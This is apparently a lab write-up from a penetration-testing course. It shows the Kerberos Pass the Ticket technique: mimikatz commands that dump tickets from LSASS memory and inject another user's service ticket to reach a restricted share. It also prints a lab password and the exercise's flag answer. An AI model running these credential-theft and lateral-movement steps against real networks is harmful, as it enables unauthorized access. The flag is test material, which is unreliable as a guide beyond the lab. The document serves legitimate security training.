Topics: Pass the Ticket
# Questions 
Start VM Group 1 and try to execute the pass the ticket technique as illustrated in this section by first logging in to CLIENT76 as jen. Try to move laterally to web04 to get the flag located in the shared folder.
# Answer
OS{86514ce6935526f07274365129f07142}

# In the previous section, we used the overpass the hash technique (along with the captured NTLM hash) to acquire a Kerberos TGT, allowing us to authenticate using Kerberos. We can only use the TGT on the machine it was created for, but the TGS potentially offers more flexibility.

# The Pass the Ticket attack takes advantage of the TGS, which may be exported and re-injected elsewhere on the network and then used to authenticate to a specific service. In addition, if the service tickets belong to the current user, then no administrative privileges are required

# In this scenario, we are going to abuse an already existing session of the user dave. The dave user has privileged access to the backup folder located on WEB04 whereas our logged-in user jen does not.

# To demonstrate the attack angle, we are going to extract all the current TGT/TGS in memory and inject dave's WEB04 TGS into our own session. This will allow us to access the restricted folder.

# Let's first log in as jen to CLIENT76 and verify that we are unable to access the resource on WEB04. To do so, we'll try to list the content of the \\web04\backup folder from an administrative PowerShell command line session.

xfreerdp /cert-ignore /u:jen /d:corp.com /p:Nexus123! /v:192.168.195.76

PS C:\Windows\system32> whoami
PS C:\Windows\system32> ls \\web04\backup
ls : Access to the path '\\web04\backup' is denied.

# Confirming that jen has no access to the restricted folder, we can now launch mimikatz, enable debug privileges, and export all the TGT/TGS from memory with the sekurlsa::tickets /export command.

mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export

# Above command parsed the LSASS process space in memory for any TGT/TGS, which is then saved to disk in the kirbi mimikatz format.

# Inspecting the generated tickets indicates that dave had initiated a session. We can try to inject one of their tickets inside jen's sessions.

# We can verify newly generated tickets with dir, filtering out on the kirbi extension.
PS C:\Tools> dir *.kirbi
...
-a----        5/21/2024   5:55 AM           1577 [0;106961]-0-0-40810000-dave@cifs-web04.kirbi
...

# As many tickets have been generated, we can just pick any TGS ticket in the dave@cifs-web04.kirbi format and inject it through mimikatz via the kerberos::ptt command.
mimikatz # kerberos::ptt [0;106961]-0-0-40810000-dave@cifs-web04.kirbi
...
* File: '[0;106961]-0-0-40810000-dave@cifs-web04.kirbi': OK
...

PS C:\Tools> klist
...
Server: cifs/web04 @ CORP.COM
...
PS C:\Tools> ls \\web04\backup
...
-a----        9/13/2022   5:52 AM              0 backup_schemata.txt
-a----        5/21/2024   5:52 AM             78 flag.txt
...
PS C:\Tools> type \\web04\backup\flag.txt
OS{86514ce6935526f07274365129f07142}





